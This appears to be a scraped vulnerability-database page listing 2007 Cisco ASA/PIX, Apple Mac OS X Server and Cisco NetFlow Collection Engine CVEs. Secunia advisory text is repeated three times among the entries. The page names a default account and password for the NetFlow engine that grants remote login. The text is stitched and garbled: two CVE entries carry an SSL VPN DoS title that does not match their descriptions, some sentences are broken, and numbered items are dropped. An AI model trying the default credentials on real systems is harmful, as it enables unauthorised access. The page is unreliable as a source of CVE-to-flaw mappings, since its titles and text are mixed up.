http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a008083316f.html
US-CERT VU#530057:
http://www.kb.cert.org/vuls/id/530057
OTHER REFERENCES:
US-CERT VU#210876:
http://www.kb.cert.org/vuls/id/210876
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0480 | CVE-2007-2463 | Cisco ASA clientless SSL VPN denial of service vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Adaptive Security Appliance (ASA) and PIX 7.1 before 7.1(2)49 and 7.2 before 7.2(2)17 allows remote attackers to cause a denial of service (device reload) via unknown vectors related to VPN connection termination and password expiry. The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. The Cisco Adaptive Security Appliance contains a memory exhaustion vulnerability that may occur when the DHCP service relay is enabled. According to Cisco Systems information IPSec VPN If an attacker attempts to exploit the, the group name and group password must be known. Remote attackers may use this vulnerability to cause the device to fail to work normally or to bypass authentication. A successful attack can result in a device reload. This vulnerability is documented as software bug CSCsh81111.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
1) An unspecified error exists when using the LDAP authentication
mechanism, which can be exploited to bypass the authentication and
gain access to the device or the network.
Successful exploitation requires that the device uses the Layer 2
Tunneling Protocol (L2TP) and is configured to use LDAP servers with
another protocol other than PAP for authentication, or that the
device offers remote management access (telnet, SSH, HTTP) and uses
an LDAP AAA server for authentication.
2) An unspecified error when using VPN connections configured with
password expiry can be exploited to cause a DoS.
Successful exploitation requires that the tunnel group is configured
with password expiry.
3) A race condition within the processing of non-standard SSL
sessions in the SSL VPN server of Cisco ASA appliances can be
exploited to cause the device to reload.
Successful exploitation requires that clientless SSL is used.
4) An error within the DHCP relay agent when handling DHCPACK
messages can be exploited to cause a DoS due to memory exhaustion by
sending a large number of DHCP requests to a vulnerable device.
Successful exploitation requires that devices are configured to use
the DHCP relay agent.
SOLUTION:
Apply updated software versions. Please see vendor advisories for
details.
PROVIDED AND/OR DISCOVERED BY:
1-3) Reported by the vendor.
4) Lisa Sittler and Grant Deffenbaugh, CERT/CC.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20070502-asa.shtml
http://www.cisco.com/warp/public/707/cisco-sr-20070502-pix.shtml
http://www.cisco.com/en/US/products/products_security_response09186a0080833172.html
http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a008083316f.html
US-CERT VU#530057:
http://www.kb.cert.org/vuls/id/530057
OTHER REFERENCES:
US-CERT VU#210876:
http://www.kb.cert.org/vuls/id/210876
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0566 | CVE-2007-2462 | Cisco ASA clientless SSL VPN denial of service vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Adaptive Security Appliance (ASA) and PIX 7.2 before 7.2(2)8, when using Layer 2 Tunneling Protocol (L2TP) or Remote Management Access, allows remote attackers to bypass LDAP authentication and gain privileges via unknown vectors. The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. The Cisco Adaptive Security Appliance contains a memory exhaustion vulnerability that may occur when the DHCP service relay is enabled. According to Cisco Systems information LDAP With authentication PAP (Password Authentication Protocol) There is no effect if is set to use.To a third party LDAP Authentication can be bypassed and unauthorized access to the appliance and internal resources can occur. PIX is a firewall device that provides policy enforcement, multi-vector attack protection and secure connection services for users and applications; Adaptive Security Appliance (ASA) is a modular platform that provides security and VPN services. Remote attackers may use this vulnerability to cause the device to fail to work normally or to bypass authentication. Access to the management session must be explicitly enabled in the device configuration and restricted to defined IP addresses only. This vulnerability is documented in Cisco Bug ID as CSCsh42793.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
2) An unspecified error when using VPN connections configured with
password expiry can be exploited to cause a DoS.
Successful exploitation requires that the tunnel group is configured
with password expiry. In order to exploit this in IPSec VPN
connections, an attacker also needs to know the group name and group
password.
3) A race condition within the processing of non-standard SSL
sessions in the SSL VPN server of Cisco ASA appliances can be
exploited to cause the device to reload.
Successful exploitation requires that clientless SSL is used.
4) An error within the DHCP relay agent when handling DHCPACK
messages can be exploited to cause a DoS due to memory exhaustion by
sending a large number of DHCP requests to a vulnerable device.
Successful exploitation requires that devices are configured to use
the DHCP relay agent.
SOLUTION:
Apply updated software versions. Please see vendor advisories for
details.
PROVIDED AND/OR DISCOVERED BY:
1-3) Reported by the vendor.
4) Lisa Sittler and Grant Deffenbaugh, CERT/CC.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20070502-asa.shtml
http://www.cisco.com/warp/public/707/cisco-sr-20070502-pix.shtml
http://www.cisco.com/en/US/products/products_security_response09186a0080833172.html
http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a008083316f.html
US-CERT VU#530057:
http://www.kb.cert.org/vuls/id/530057
OTHER REFERENCES:
US-CERT VU#210876:
http://www.kb.cert.org/vuls/id/210876
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0481 | CVE-2007-2464 | Cisco ASA clientless SSL VPN denial of service vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Race condition in Cisco Adaptive Security Appliance (ASA) and PIX 7.1 before 7.1(2)49 and 7.2 before 7.2(2)19, when using "clientless SSL VPNs," allows remote attackers to cause a denial of service (device reload) via "non-standard SSL sessions.". The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. The Cisco Adaptive Security Appliance contains a memory exhaustion vulnerability that may occur when the DHCP service relay is enabled. Remote attackers may use this vulnerability to cause the device to fail to work normally or to bypass authentication. This vulnerability is documented as bug CSCsi16248.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
1) An unspecified error exists when using the LDAP authentication
mechanism, which can be exploited to bypass the authentication and
gain access to the device or the network.
Successful exploitation requires that the device uses the Layer 2
Tunneling Protocol (L2TP) and is configured to use LDAP servers with
another protocol other than PAP for authentication, or that the
device offers remote management access (telnet, SSH, HTTP) and uses
an LDAP AAA server for authentication.
2) An unspecified error when using VPN connections configured with
password expiry can be exploited to cause a DoS.
Successful exploitation requires that the tunnel group is configured
with password expiry. In order to exploit this in IPSec VPN
connections, an attacker also needs to know the group name and group
password.
Successful exploitation requires that clientless SSL is used.
4) An error within the DHCP relay agent when handling DHCPACK
messages can be exploited to cause a DoS due to memory exhaustion by
sending a large number of DHCP requests to a vulnerable device.
Successful exploitation requires that devices are configured to use
the DHCP relay agent.
SOLUTION:
Apply updated software versions. Please see vendor advisories for
details.
PROVIDED AND/OR DISCOVERED BY:
1-3) Reported by the vendor.
4) Lisa Sittler and Grant Deffenbaugh, CERT/CC.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20070502-asa.shtml
http://www.cisco.com/warp/public/707/cisco-sr-20070502-pix.shtml
http://www.cisco.com/en/US/products/products_security_response09186a0080833172.html
http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a008083316f.html
US-CERT VU#530057:
http://www.kb.cert.org/vuls/id/530057
OTHER REFERENCES:
US-CERT VU#210876:
http://www.kb.cert.org/vuls/id/210876
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0156 | CVE-2007-0745 | Apple Security Update 2007-004 Directory access vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The Apple Security Update 2007-004 uses an incorrect configuration file for FTPServer in Apple Mac OS X Server 10.4.9, which might allow remote authenticated users to access additional directories. Mac OS X Server is prone to a remote security vulnerability
| VAR-200704-0470 | CVE-2007-2282 | Cisco NetFlow Collection Engine contains known default passwords |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco Network Services (CNS) NetFlow Collection Engine (NFC) before 6.0 has an nfcuser account with the default password nfcuser, which allows remote attackers to modify the product configuration and, when installed on Linux, obtain login access to the host operating system. A vulnerability in the Cisco NetFlow Collection Engine could allow a remote attacker to gain access to a vulnerable system. This issue stems from a design flaw that makes an insecure account available to remote users.
Versions of Cisco NFC prior to 6.0 are vulnerable to this issue.
Cisco is tracking this issue as Cisco Bug ID CSCsh75038. When NFC is installed, a default user account will be created and a corresponding password will be set. NFC is installed on a supported UNIX platform. During the installation process, a default web-based user account nfcuser is created, which is used to perform application maintenance, configuration, and troubleshooting with the password nfcuser. Before version 6.0, the Linux installation program will also create a local user named nfcuser on the operating system, and the default password is exactly the same as the user name. If the account already exists, the Linux installer will change the password to be the same as the username